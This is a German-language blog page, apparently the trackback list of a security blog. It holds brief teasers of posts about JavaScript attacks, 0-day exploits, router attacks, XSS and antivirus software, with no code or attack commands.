Dipl.-Inform. Carsten Eilers am : Drucksache: windows.developer Magazin 3.2014 - JavaScript in Angreiferhand

"Drucksache: windows.developer Magazin 3.2014 - JavaScript in Angreiferhand" vollständig lesen
Im windows.developer 3.2014 ist ein Artikel über Angriffe über JavaScript erschienen. JavaScript-Code kann so wie jedes andere Computerprogramm auch Schwachstellen enthalten, und so wie in jeder anderer Programmiersprache kön

Dipl.-Inform. Carsten Eilers am : Kommentare zu trickreichen Drive-by-Infektionen und mehr

"Kommentare zu trickreichen Drive-by-Infektionen und mehr" vollständig lesen
Heute gibt es Kommentare zur 0-Day-Schwachstelle im Flash Player, einer neuen Taktik für Drive-by-Infektionen und Werbung für bösartige Installationsprogramme. Und gleich zu Anfang einen Hinweis zu Schadsoftware anlässlich der O

Dipl.-Inform. Carsten Eilers am : Linksys, AVM, Asus - Router in Gefahr

"Linksys, AVM, Asus - Router in Gefahr" vollständig lesen
Das Internet Storm Center warnt vor einem aktuell laufenden Massen-Angriff auf Linksys E1000 und E1200 Router. Das Bundesamt für Sicherheit in der Informationstechnik (BSI) empfiehlt dringend die Installation der von AVM veröffentlich

Dipl.-Inform. Carsten Eilers am : Dritter 0-Day-Exploit für den Internet Explorer in 2014 entdeckt

"Dritter 0-Day-Exploit für den Internet Explorer in 2014 entdeckt" vollständig lesen
Microsoft warnt vor einem 0-Day-Exploit für den Internet Explorer. Es ist der dritte für den IE und der sechste insgesamt im Jahr 2014. Das besondere an diesem Exploit: Er betrifft alle IE-Versionen von 6 bis 11 und damit auch das nic

Dipl.-Inform. Carsten Eilers am : Schutz ohne Antivirus-Software ist möglich

"Schutz ohne Antivirus-Software ist möglich" vollständig lesen
Symantec hat die Antivirus-Software für tot erklärt und dabei gleich noch zugegeben, dass sie sowieso fast wirkungslos ist: Nur ca. 45% der Angriffe und damit weniger als die Hälfte werden überhaupt noch von den Antivirus-Progra

Dipl.-Inform. Carsten Eilers am : Eine neue 0-Day-Schwachstelle im IE, diesmal ohne Angriff darauf

"Eine neue 0-Day-Schwachstelle im IE, diesmal ohne Angriff darauf" vollständig lesen
Es gibt eine neue 0-Day-Schwachstelle im Internet Explorer. Diesmal ausnahmsweise ohne zugehörigen Exploit, zumindest zur Zeit droht also noch keine Gefahr. Aber das kann sich unter Umständen schnell ändern. Die Schwachstelle

Dipl.-Inform. Carsten Eilers am : SCADA-Systeme und Industriesteuerungen auf den Sicherheitskonferenzen ab 2013

"SCADA-Systeme und Industriesteuerungen auf den Sicherheitskonferenzen ab 2013" vollständig lesen
Und weiter geht es mit den Vorträgen zu SCADA-Systemen und Industriesteuerungen auf den Sicherheitskonferenzen "Black Hat" und "Hack in the Box". Nach den Konferenzen in den Jahren 2010/2011, 2011 und 2012 ist nun das Jahr 2013 an der Reihe

Dipl.-Inform. Carsten Eilers am : 0-Day-Exploits für Adobe Reader, Acrobat und IE - Ausgabe August 2014

"0-Day-Exploits für Adobe Reader, Acrobat und IE - Ausgabe August 2014" vollständig lesen
Es ist mal wieder soweit: Es gibt neue 0-Day-Exploits. Zum einen für Adobe Reader und Acrobat, dort ist der Ausbruch aus der Sandbox und dadurch die Ausführung beliebigen Codes möglich. Das ist in diesem Jahr der neunte 0-Day-Explo

Dipl.-Inform. Carsten Eilers am : Kommentare zum iCloud-Angriff, Heartbleed-Angriffen und Angriffen über Werbung

"Kommentare zum iCloud-Angriff, Heartbleed-Angriffen und Angriffen über Werbung" vollständig lesen
Heute gibt es mal wieder Kommentare zu neuen Entwicklungen bei altbekannten Problemen. Los geht es mit einem nicht besonders alten Problem, den aus der iCloud geklauten Promi-Nacktfotos: Die iCloud wurde nicht angegriffen, nur ihre Nutzer!

Dipl.-Inform. Carsten Eilers am : Neues eBook: Android Security - Von Fake-Apps, Trojanern und Spy Phones

"Neues eBook: Android Security - Von Fake-Apps, Trojanern und Spy Phones" vollständig lesen
Bei entwickler.press ist mein E-Book über die Sicherheit von Android erschienen: "Android Security - Von Fake-Apps, Trojanern und Spy Phones". Es gibt einen Überblick über die aktuelle Sicherheitslage von Android: W

Dipl.-Inform. Carsten Eilers am : Neues zu den 0-Day-Exploits, besonders bösartige Werbung und mehr

"Neues zu den 0-Day-Exploits, besonders bösartige Werbung und mehr" vollständig lesen
Es gibt Neues zu den von Microsofts am Oktober-Patchday behobenen 0-Day-Schwachstellen, es wurde besonders bösartige Werbung entdeckt, und dann gibt es da noch ein paar widersprüchliche Meldungen. Ach so, und was die Nutzung von Fake-

Dipl.-Inform. Carsten Eilers am : Drucksache: windows.developer Magazin 12.2014 - JavaScript und die Sicherheit

"Drucksache: windows.developer Magazin 12.2014 - JavaScript und die Sicherheit" vollständig lesen
Im windows.developer 12.2014 ist ein Artikel über Angriffe zur Sicherheit von JavaScript erschienen. Darin geht es um zwei Themen: Zum einen um einige neue bzw. verbesserte Angriffe, die auf den Sicherheitskonferenzen vorgestellt wurden. Zu

Dipl.-Inform. Carsten Eilers am : WireLurker, Schritt 1: Der Angriff auf den Mac

"WireLurker, Schritt 1: Der Angriff auf den Mac" vollständig lesen
Angriffs auf iOS gibt es hier, eine Bewertung des Angriffs hier. Der Mac-Schädling Am 5. November wurde im Palo Alto Networks Blog ein Whitepaper zu einem neuen Angriff auf Mac OS X und iOS angekündigt: WireLurker. Der Angriff be

Dipl.-Inform. Carsten Eilers am : Neues eBook: "JavaScript Security - Sicherheit im Webbrowser"

"Neues eBook: "JavaScript Security - Sicherheit im Webbrowser"" vollständig lesen
Bei entwickler.press ist mein eBook über die Sicherheit von JavaScript erschienen: "JavaScript Security - Sicherheit im Webbrowser" Wie der Name schon sagt geht es um die Sicherheit von JavaScript (und HTML5, dass ja viele neue JavaSc

Dipl.-Inform. Carsten Eilers am : Einige kommentierte Updates zu älteren Artikeln

"Einige kommentierte Updates zu älteren Artikeln" vollständig lesen
Heute gibt es mal wieder einige kommentierte Ergänzungen zu älteren Artikeln. 0-Day-Exploit für ein NAS, aber der Patch hat Zeit? Voriges Jahr gab es die erste Ransomware für Synology NAS. Und die nutzte eine Schwachstelle

Dipl.-Inform. Carsten Eilers am : Cross-Site Scripting im Überblick, Teil 6: Informationen einschleusen

"Cross-Site Scripting im Überblick, Teil 6: Informationen einschleusen" vollständig lesen
Nach der Vorstellung der verschiedenen Möglichkeiten, XSS-Schadcode in Webanwendungen einzuschleusen, geht es ab dieser Folge um die Angriffe, die über XSS möglich sind. Das klassische Beispiel: Wir öffnen eine Alertbox (G&aum

entwickler.de am : PingBack

"PingBack" vollständig lesen

Dipl.-Inform. Carsten Eilers am : Virenscanner und Co. - Pro und Contra

"Virenscanner und Co. - Pro und Contra" vollständig lesen
Virenscanner oder Antivirenprogramme oder wie auch immer man sie nennen will sind nicht unumstritten. Für manche nutzloses Schlangenöl, für andere ein Allheilmittel zur Abwehr von Angriffen, für noch andere sogar eine Gefahr f&uu

entwickler.de am : PingBack

"PingBack" vollständig lesen

Dipl.-Inform. Carsten Eilers am : Drucksache: Windows Developer 8.15 - Einstieg in die Welt der Exploits

"Drucksache: Windows Developer 8.15 - Einstieg in die Welt der Exploits" vollständig lesen
Im windows.developer 8.15 ist ein Artikel über das Testen von Schwachstellen, Workarounds und Patches mit Hilfe von Exploits erschienen. Als "Exploit" wird Code bezeichnet, mit dem eine Schwachstelle ausgenutzt wird. Die Cyberkriminellen

Kommentare

Ansicht der Kommentare: Linear | Verschachtelt

Noch keine Kommentare

Kommentar schreiben

Die angegebene E-Mail-Adresse wird nicht dargestellt, sondern nur für eventuelle Benachrichtigungen verwendet.
Standard-Text Smilies wie :-) und ;-) werden zu Bildern konvertiert.
BBCode-Formatierung erlaubt

Kommentare werden erst nach redaktioneller Prüfung freigeschaltet!